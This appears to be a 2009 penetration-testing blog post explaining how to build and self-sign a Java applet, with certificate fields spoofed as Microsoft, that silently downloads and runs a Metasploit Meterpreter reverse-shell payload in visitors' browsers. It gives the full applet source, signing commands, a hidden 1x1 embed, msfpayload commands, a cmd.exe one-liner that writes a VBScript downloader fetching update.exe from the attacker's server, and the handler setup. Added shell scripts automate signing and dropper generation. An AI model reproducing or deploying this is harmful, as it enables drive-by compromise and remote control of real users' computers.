Building a Java Applet with Meterpreter Payload

July 3, 2009

At Infosec World Conference, I gave a presentation on Breaking the Browser with Rafal Los. One of the demos that I prepared was a Java Applet with a Meterpreter Payload. The demo can be found here.

In this post, we will first build an applet that simply executes cmd.exe, then swap in a command that fetches and runs a Meterpreter payload. Here is the source code of the applet:

import java.applet.Applet;
import java.io.IOException;

public class MSFcmd extends Applet {
    // init() runs as soon as the browser loads the applet, so no click is needed.
    public void init() {
        // Swap in the download-and-execute command built later in this post.
        String cmd = "cmd.exe";
        try {
            // Spawns the command as a child of the browser's Java process. This is
            // only permitted because the applet is signed and the user accepted the
            // warning dialog; the sandbox blocks exec() for unsigned applets.
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Next, we self-sign the applet. An unsigned applet runs inside the Java sandbox and is not allowed to spawn processes; a signed one, once the user clicks through the certificate warning, runs with the full privileges of the logged-in user, which is what lets the exec() call above succeed.

Compile the applet source to a class file:
javac MSFcmd.java
Package the compiled class into a JAR file:
jar cvf MSFcmd.jar MSFcmd.class
Generate a key pair (keytool prompts for the certificate subject fields; its default validity is 90 days, which is what later triggers jarsigner's "will expire within six months" warning, so add -validity <days> if the applet needs to stay usable longer):
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass

Sign the JAR file with that key:
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet

Export the public key certificate (the browser does not need this file, since the signed JAR already carries the certificate; it is handy for inspecting what the victim will be shown):
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer

To make this easier for people to use, I built a simple bash script called makeapplet.sh.
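The author's makeapplet.sh is not reproduced on this page. The script below is an added reconstruction of such a helper built from the five manual steps above, not the author's own code: it uses the same keystore name, alias and passwords, takes the applet name as an argument instead of prompting for it, reuses an existing keystore on later runs, and adds -validity 365 (an assumption; keytool's default is 90 days). DRY_RUN=1 prints the commands instead of running them, which is useful for checking the invocation before the JDK tools are on the path.

```shell
#!/bin/sh
# Reconstruction of a makeapplet.sh-style helper (added example, not the
# author's script): compile, package, sign and export the certificate for an
# applet. Usage: ./makeapplet.sh MSFcmd   (expects MSFcmd.java in the cwd)
set -eu

KEYSTORE=mykeystore
KEYALIAS=signapplet
STOREPASS=mystorepass
KEYPASS=mykeypass
VALIDITY_DAYS=365            # assumption; keytool's default of 90 days is what
                             # triggers jarsigner's "expire within six months"
DRY_RUN="${DRY_RUN:-0}"      # DRY_RUN=1 prints each command instead of running it

# Run a command, or just print it in dry-run mode.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# build_signed_applet NAME -> produces SignedNAME.jar and mycertificate.cer
build_signed_applet() {
    name="$1"
    if [ "$DRY_RUN" != "1" ] && [ ! -f "$name.java" ]; then
        echo "[-] $name.java not found" >&2
        return 1
    fi

    echo "[+] Compiling the applet"
    run javac "$name.java"

    echo "[+] Packaging the compiled class into a JAR file"
    run jar cvf "$name.jar" "$name.class"

    # Generate the key pair only once; later runs reuse the keystore.
    if [ "$DRY_RUN" = "1" ] || [ ! -f "$KEYSTORE" ]; then
        echo "[+] Generating key pairs (keytool prompts for the certificate subject)"
        run keytool -genkey -alias "$KEYALIAS" -keystore "$KEYSTORE" \
            -keypass "$KEYPASS" -storepass "$STOREPASS" -validity "$VALIDITY_DAYS"
    fi

    echo "[+] Signing the JAR file"
    run jarsigner -keystore "$KEYSTORE" -storepass "$STOREPASS" -keypass "$KEYPASS" \
        -signedjar "Signed$name.jar" "$name.jar" "$KEYALIAS"

    echo "[+] Exporting the public key certificate"
    run keytool -export -keystore "$KEYSTORE" -storepass "$STOREPASS" \
        -alias "$KEYALIAS" -file mycertificate.cer

    echo "[+] Done: Signed$name.jar"
}

if [ $# -gt 0 ]; then
    build_signed_applet "$1"
fi
```

Run it as `./makeapplet.sh MSFcmd` from the directory holding MSFcmd.java; `DRY_RUN=1 ./makeapplet.sh MSFcmd` shows exactly the keytool/jarsigner lines that would be executed.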

Example of running makeapplet.sh:
./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
[Unknown]:
What is the name of your organizational unit?
[Unknown]:
Microsoft
What is the name of your organization?
[Unknown]:
Microsoft Organization
What is the name of your City or Locality?
[Unknown]:
Redmond
What is the name of your State or Province?
[Unknown]:
Seatle
What is the two-letter country code for this unit?
[Unknown]:
US
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?
[no]:
yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Finally, deploy the signed JAR and a page that embeds it; the 1x1 size keeps the applet out of sight:
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo '<applet code="MSFcmd.class" archive="SignedMSFcmd.jar" height="1" width="1"></applet>' > /var/www/index.html
sudo /etc/init.d/apache2 start
Browse to the web server from a Windows system. After the user accepts the signed-applet warning, cmd.exe is executed.

To have the applet hand us a Meterpreter reverse shell instead, we change the command it runs. First, build the malicious executable with Metasploit (replace x.x.x.x with the IP of your server; the handler set up below listens on port 443):

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -t exe -o update.exe
cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe

Now replace the cmd string in the applet with a command that downloads and executes update.exe. It uses cmd.exe to echo a small VBScript downloader into C:\windows\apsou.vbs line by line, then starts that script with the URL and the destination path as its two arguments:
cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://x.x.x.x/update.exe C:\windows\update.exe
(replace x.x.x.x with the IP of your server; the URL must point at the same filename that was copied to /var/www/ above)
When pasting this into the Java source, every embedded double quote must be written as \" and every backslash as \\, or the file will not compile. The script also writes into C:\windows, which requires the browsing user to have write access there (typical on Windows XP, where users are usually local administrators); on Vista and later with UAC, a standard user cannot write to C:\Windows, so a user-writable location such as %TEMP% has to be used instead.

Reference: http://www.milw0rm.com/papers/262
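Hand-building the echo chain above is error-prone, and the same escaping work is needed again when the result goes into the Java source. The script below is an added example, not code from the original post or the referenced paper: it generates the "cmd.exe /c echo ... > file & echo ... >> file & start file args" one-liner from any VBScript file, going beyond the single command shown above in that it escapes the characters cmd.exe treats specially (& | < > ^) and handles blank lines, and then escapes the result for use as a Java string literal. The target path C:\windows\apsou.vbs and the URL http://x.x.x.x/update.exe are the post's; the trimmed downloader script embedded in demo() is constructed here as sample input.

```shell
#!/bin/sh
# Added example (not from the original post): turn a multi-line VBScript into
# the cmd.exe echo-chain dropper used above, then escape it for a Java literal.
set -eu

# vbs_dropper_cmd VBS_FILE TARGET [START_ARGS...]
# Prints one cmd.exe command line that recreates VBS_FILE at TARGET on the
# victim and then runs it via "start" with START_ARGS.
vbs_dropper_cmd() {
    vbs="$1"; target="$2"; shift 2
    cmd="cmd.exe /c"
    redir=">"                     # first line creates the file, later ones append
    while IFS= read -r line || [ -n "$line" ]; do
        if [ -n "$line" ]; then
            # cmd.exe metacharacters would otherwise end the echo; ^ escapes them.
            esc=$(printf '%s' "$line" | sed 's/[&|<>^]/^&/g')
            cmd="$cmd echo $esc $redir $target &"
        else
            # "echo." writes an empty line; a bare "echo" prints "ECHO is off."
            cmd="$cmd echo. $redir $target &"
        fi
        redir=">>"
    done < "$vbs"
    printf '%s\n' "$cmd start $target${1:+ $*}"
}

# java_string_literal STRING -> the same text escaped for a Java "..." literal
# (backslashes doubled, double quotes backslash-escaped).
java_string_literal() {
    printf '%s' "$1" | sed 's/\\/\\\\/g; s/"/\\"/g'
    printf '\n'
}

# Stand-alone demo with a constructed downloader (same logic as the post's
# apsou.vbs, trimmed): prints the cmd.exe one-liner and the Java declaration.
demo() {
    tmp=$(mktemp -d)
    cat > "$tmp/dl.vbs" <<'EOF'
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
Http.Open "GET", Wscript.Arguments(0), False
Http.Send
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write Http.ResponseBody
BinaryStream.SaveToFile Wscript.Arguments(1), 2
CreateObject("WScript.Shell").Run Wscript.Arguments(1)
EOF
    cmd=$(vbs_dropper_cmd "$tmp/dl.vbs" 'C:\windows\apsou.vbs' \
          http://x.x.x.x/update.exe 'C:\windows\update.exe')
    echo "cmd.exe one-liner:"
    printf '%s\n\n' "$cmd"
    echo "Java: String cmd = \"$(java_string_literal "$cmd")\";"
    rm -rf "$tmp"
}

if [ $# -eq 0 ]; then
    demo
fi
```

The Java line printed by demo() can be pasted straight over the `String cmd = "cmd.exe";` declaration in the applet.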

Setup Metasploit to listen for the connections:
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
save
exploit -j


[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler…
PWN dem V0hns!

Regards,
Jabra
